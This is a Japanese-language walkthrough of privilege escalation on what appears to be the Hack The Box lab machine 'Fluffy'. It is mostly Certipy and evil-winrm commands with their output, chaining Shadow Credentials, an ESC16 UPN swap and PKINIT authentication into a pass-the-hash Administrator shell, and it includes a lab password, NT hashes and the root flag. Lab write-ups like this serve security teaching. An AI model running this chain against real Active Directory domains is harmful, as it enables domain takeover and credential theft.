権限昇格
Shadow Credential攻撃をCA_SVCにも行います。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad shadow auto \
-u 'p.agila@fluffy.htb' \
-p 'prometheusx-303' \
-dc-ip 10.129.12.232 \
-dc-host dc01.fluffy.htb \
-account 'CA_SVC'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'cdb2d666dca940f5ac40de2664221bcc'
[*] Adding Key Credential with device ID 'cdb2d666dca940f5ac40de2664221bcc' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'cdb2d666dca940f5ac40de2664221bcc' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
┌──(kali㉿kali)-[~/htb/fluffy]
└─$
取得したアカウント情報より脆弱な証明書テンプレートを調査します。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad find -vulnerable -u CA_SVC -hashes ":ca0f4f9e9eb8a092addf53bb03fc98c8" -dc-ip 10.129.12.232
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260330061728_Certipy.txt'
[*] Wrote text output to '20260330061728_Certipy.txt'
[*] Saving JSON output to '20260330061728_Certipy.json'
[*] Wrote JSON output to '20260330061728_Certipy.json'
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ cat 20260330061728_Certipy.txt
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
以下の流れで進めます。
UPNの書き換えなのでESC1に近い流れになります。
- p.agilaでShadow Credentialsを使い、ca_svcに一時的な証明書ログイン手段を追加する。
- その証明書でca_svcとしてTGT+NTハッシュを取得する。
- ca_svcのTGTを使ってAD CSに対し、UPNがadministratorの証明書を発行させる。
- administrator.pfxでPKINIT認証し、ドメイン管理者のNTハッシュを取得する。
ca_svcとしてTGT+NTハッシュを取得します。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.129.232.88' -dc-host 'dc01.fluffy.htb' -account 'ca_svc' auto
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7360fd2e00354660bee994d09adc7a7c'
[*] Adding Key Credential with device ID '7360fd2e00354660bee994d09adc7a7c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '7360fd2e00354660bee994d09adc7a7c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
File 'ca_svc.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename):
[*] Wrote credential cache to 'ca_svc_094a68e5-e53b-4e7f-a4ca-13744e990800.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
一時的にca_svcユーザーのUPNをadministratorに更新します。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.129.232.88' -dc-host 'dc01.fluffy.htb' -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
環境変数KRB5CCNAMEを取得したTGTに更新します。
以下のコマンドを実行して、AD CSに証明書の発行を要求します。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ export KRB5CCNAME=ca_svc.ccache
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad req -k -dc-ip '10.129.232.88' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User' -debug
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: FLUFFY.HTB
[+] Username retrieved from CCache: ca_svc
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[+] DC host (-dc-host) not specified. Using domain as DC host
[+] Nameserver: '10.129.232.88'
[+] DC IP: '10.129.232.88'
[+] DC Host: 'FLUFFY.HTB'
[+] Target IP: None
[+] Remote Name: 'DC01.FLUFFY.HTB'
[+] Domain: 'FLUFFY.HTB'
[+] Username: 'CA_SVC'
[+] Trying to resolve 'DC01.FLUFFY.HTB' at '10.129.232.88'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from ca_svc.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: ca_svc
[+] Getting TGS for 'HOST/DC01.FLUFFY.HTB'
[+] Got TGS for 'HOST/DC01.FLUFFY.HTB'
[+] Trying to connect to endpoint: ncacn_np:10.129.232.88[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.232.88[\pipe\cert]
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
ca_svcユーザーのUPNを復元します。その後administratorとして認証します。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.129.232.88' -dc-host 'dc01.fluffy.htb' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad auth -dc-ip '10.129.232.88' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
取得できたNTハッシュを使ってAdministratorとしてアクセスできます。
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ evil-winrm -i 10.129.232.88 -u 'administrator' -H 8da83a3fa618b6e3a00e93f676c92a6e
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
7a742c0db8fba4a8ce16d6881008565e
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
